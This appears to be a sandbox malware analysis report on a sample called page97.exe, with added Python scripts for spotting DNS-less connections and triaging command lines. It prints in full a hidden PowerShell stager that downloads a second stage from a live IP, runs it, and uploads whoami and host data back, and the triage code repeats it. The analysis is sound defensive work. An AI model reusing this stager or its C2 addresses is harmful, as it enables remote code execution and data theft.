Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: http://217.12.218.107:25928/page97 |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:30139/ZKcMQ |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:3 |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:30139 |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:30139 |
Virustotal: Detection: 7% |
Source: page97.exe |
ReversingLabs: Detection: 57% |
Source: page97.exe |
Virustotal: Detection: 70% |
Source: page97.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: page97.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdb source: powershell.exe, 0000000B.00000002.2331550599.00000184BC180000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb# source: powershell.exe, 0000000B.00000002.2331550599.00000184BC14F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2331550599.00000184BC1F1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb{|uD source: powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ion.pdb source: powershell.exe, 0000000B.00000002.2331550599.00000184BC1F1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdb4 source: powershell.exe, 0000000B.00000002.2331550599.00000184BC180000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: e.pdbBr source: powershell.exe, 0000000B.00000002.2331550599.00000184BC14F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: winword.exe |
Memory has grown: Private usage: 3MB later: 69MB |
Source: global traffic |
TCP traffic: 192.168.2.5:49717 -> 217.12.218.107:30139 |
Source: Joe Sandbox View |
ASN Name: ITLDC-NLUA ITLDC-NLUA |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.12.218.107 |
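The "TCP traffic detected without corresponding DNS query" finding above is a correlation the sandbox does for you; the same check is easy to run over your own host telemetry. The block below is an added example (not part of the report or of Joe Sandbox): it replays constructed DNS and connection events in which only the 217.12.218.107:30139 connection and the ctldl.windowsupdate.com name come from the report, every other value (timestamps, 203.0.113.10, the local SMB connection) is made up for the demonstration, and it reports outbound connections to non-local addresses that no earlier DNS answer explains.

```python
"""Flag outbound TCP connections whose destination never appeared in a DNS answer.

Added example: event tuples are an invented shape, not a real log format.
"""
import ipaddress

# Constructed DNS answers: (timestamp, process, queried name, answer IPs).
# 203.0.113.10 is a documentation address standing in for the real resolution.
DNS_EVENTS = [
    (100, "svchost.exe", "ctldl.windowsupdate.com", ["203.0.113.10"]),
    (101, "powershell.exe", "pesterbdd.com", []),  # empty answer (NXDOMAIN-style)
]

# Constructed connection events: (timestamp, process, src_ip, dst_ip, dst_port).
# The :30139 connection is the one the report records; the others are constructed.
CONN_EVENTS = [
    (102, "svchost.exe", "192.168.2.5", "203.0.113.10", 80),
    (103, "powershell.exe", "192.168.2.5", "217.12.218.107", 30139),
    (104, "powershell.exe", "192.168.2.5", "217.12.218.107", 25928),
    (105, "powershell.exe", "192.168.2.5", "192.168.2.1", 445),  # local, expected without DNS
]

# Only these ranges are excused from the check; documentation ranges such as
# 203.0.113.0/24 deliberately count as "external" so the sample data exercises it.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_local(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def resolved_ips(dns_events, before_ts):
    """All IPs handed back by DNS answers observed up to and including before_ts."""
    ips = set()
    for ts, _proc, _name, answers in dns_events:
        if ts <= before_ts:
            ips.update(answers)
    return ips


def connections_without_dns(dns_events, conn_events):
    """(process, dst_ip, dst_port) for every non-local connection with no prior DNS answer.

    Ordering matters: an answer that arrives after the connection does not excuse it.
    """
    findings = []
    for ts, proc, _src, dst, port in conn_events:
        if is_local(dst):
            continue
        if dst in resolved_ips(dns_events, ts):
            continue
        findings.append((proc, dst, port))
    return findings


def summarize(findings):
    """Collapse per-port findings so one C2 host with several ports yields one entry."""
    by_host = {}
    for proc, dst, port in findings:
        by_host.setdefault((proc, dst), set()).add(port)
    return {key: sorted(ports) for key, ports in by_host.items()}


if __name__ == "__main__":
    for (proc, dst), ports in summarize(connections_without_dns(DNS_EVENTS, CONN_EVENTS)).items():
        print(f"{proc} -> {dst} ports {ports}: no DNS query seen")
```

The time check is the part worth keeping when you port this to a real pipeline: a lookup cache that ignores ordering will let a later, unrelated resolution of the same address retroactively excuse the first direct-to-IP connection.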
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A54D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2298540716.00000184A2425000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:25928/page97 |
Source: wscript.exe, 00000005.00000002.2056263641.0000020D8D0D5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:3 |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A5368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2299298081.00000184A535D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:30139 |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A54D6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:30139/ZKcMQ |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A54D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2298540716.00000184A2425000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt |
Source: powershell.exe, 0000000B.00000002.2371839899.00000184BC250000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:30139/zkcmqasolrgsrjla/page97/upgrade.txt |
Source: wscript.exe, 00000005.00000002.2056263641.0000020D8D0D5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.108u |
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.2.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3DA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2299298081.00000184A572E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3F5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3D31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3F5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3D31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3F5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A495D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3DA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2299298081.00000184A572E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: page97.exe, Program.cs |
Base64 encoded string: System.Net |
Source: page97.exe, Program.cs |
Long String: Length: 16352 |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://217.12.218.107:25928/page97',$drpy);} |
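The command line above is the whole first stage: powershell.exe is launched from wscript.exe with the execution policy bypassed, the window hidden and profiles disabled; it fetches upgrade.txt from 217.12.218.107:30139, runs it with IEX, and posts the result (or, when the stage-2 text does not contain 'get-content', the output of whoami plus the IEX output) back to 217.12.218.107:25928 with UploadData. Note that `$ip` is never assigned anywhere in the one-liner. The block below is an added triage example, not code from the report or from the sample: it parses that exact command line, pulls out the URLs and direct-to-IP endpoints, and flags the patterns a detection rule would key on. The indicator names and the score are this example's own conventions.

```python
"""Triage of the wscript.exe -> powershell.exe command line recorded in the report.

Added example. CMDLINE is copied from the sandbox's process-creation event;
INDICATORS and the score are conventions invented for this example.
"""
import ipaddress
import re
from urllib.parse import urlparse

CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-executionpolicy bypass -w hidden -noprofile -c "
    "$iik=new-object net.webclient;"
    "$flm=$iik.downloaddata('http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt');"
    "if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);"
    "if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}"
    "else{$bjdo=whoami;$bjdo+='==';"
    "$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;"
    "$bjdo+=IEX $jkr|out-string;"
    "[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};"
    "$ujk=new-object net.webclient;"
    "$ujk.uploaddata('http://217.12.218.107:25928/page97',$drpy);}"
)

URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.I)

# Indicator name -> regex, matched case-insensitively. Parameter patterns accept
# the abbreviations PowerShell allows (-ep / -exec, -win, -nop ...).
INDICATORS = {
    "execution_policy_bypass": r"-e(?:p|x\w*)\s+bypass",
    "hidden_window": r"-w\w*\s+hidden",
    "no_profile": r"-nop\w*",
    "web_download": r"\.download(?:data|string|file)\(",
    "invoke_expression": r"\biex\b|invoke-expression",
    "web_upload": r"\.upload(?:data|string|file)\(",
    "host_recon": r"\bwhoami\b|gethostaddresses",
}


def extract_urls(cmdline: str) -> list:
    """Every http(s) URL embedded in the command line, in order of appearance."""
    return URL_RE.findall(cmdline)


def direct_ip_endpoints(urls) -> list:
    """(host, port) for URLs whose host is an IP literal.

    These need no DNS lookup, which is why the sandbox also reports the
    connections as 'TCP traffic detected without corresponding DNS query'.
    """
    out = []
    for url in urls:
        p = urlparse(url)
        if not p.hostname:
            continue
        try:
            ipaddress.ip_address(p.hostname)
        except ValueError:
            continue  # a hostname, not an IP literal
        out.append((p.hostname, p.port or (443 if p.scheme.lower() == "https" else 80)))
    return out


def match_indicators(cmdline: str) -> list:
    """Sorted names of every INDICATORS pattern found in the command line."""
    return sorted(name for name, rx in INDICATORS.items() if re.search(rx, cmdline, re.I))


def triage(cmdline: str) -> dict:
    """Combine IOC extraction and indicator matching into one triage record."""
    urls = extract_urls(cmdline)
    endpoints = direct_ip_endpoints(urls)
    hits = match_indicators(cmdline)
    if endpoints:
        hits.append("direct_ip_c2")
    hits.sort()
    return {"urls": urls, "endpoints": endpoints, "indicators": hits, "score": len(hits)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(CMDLINE), indent=2))
```

Any two or three of these indicators together on a powershell.exe child of wscript.exe, winword.exe or another Office process is already enough for an alert; the full set, plus both endpoints being raw IP literals on non-standard ports, is what makes this command line unambiguous.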
Source: page97.exe, 00000000.00000002.2012777296.000000001B84C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameWinWord.exeB vs page97.exe |
Source: page97.exe, 00000000.00000002.2012777296.000000001B84C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameWinWord.ex vs page97.exe |
Source: page97.exe, 00000000.00000002.2012777296.000000001B84C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameschtasks.exej% vs page97.exe |
Source: page97.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: page97.exe, Program.cs |
Base64 encoded string: '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 |